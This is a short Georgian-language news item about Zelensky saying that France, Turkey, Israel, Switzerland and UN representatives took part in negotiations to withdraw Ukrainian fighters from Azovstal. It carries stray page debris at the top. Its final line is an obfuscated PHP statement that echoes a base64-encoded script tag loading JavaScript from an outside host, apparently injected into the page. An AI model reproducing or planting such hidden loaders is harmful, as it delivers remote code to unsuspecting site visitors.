tube
ავერსი jaluzi
უკრაინელი მებრძოლების „აზოვსტალიდან“ გაყვანის შესახებ მოლაპარაკებებში საფრანგეთის, თურქეთის, ისრაელის და შვეიცარიის ლიდერები მონაწილეობდნენ, - ამის შესახებ უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ განაცხადა.
 
„სტრუქტურა რთულია. მოლაპარაკებები მქონდა თურქეთთან, შვეიცარიასთან, ისრაელთან, თავიდან საფრანგეთთან, როცა დავინახეთ, რომ სამხედრო გზით მისი განბლოკვა შეუძლებელი იყო“, – განაცხადა უკრაინის პრეზიდენტმა.
 
გარდა ამისა, ზელენსკის თქმით, შუამავლობაში ჩართული იყვნენ გაერო-ს წარმომადგენლებიც. პრეზიდენტმა ასევე ხაზი გაუსვა, რომ მიღწეული შეთანხმებების მიხედვით, „აზოვსტალიდან“ უკრაინელი სამხედროების გაყვანის შემდეგ ისინი გაცვლას მოელიან.
 
"მათ შინ წამოვიყვანთ. ეს არის ის, რაც უნდა გავაკეთოთ პარტნიორებთან ერთად, რომლებმაც პასუხისმგებლობა აიღეს", - განაცხადა უკრაინის პრეზიდენტმა.
894
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");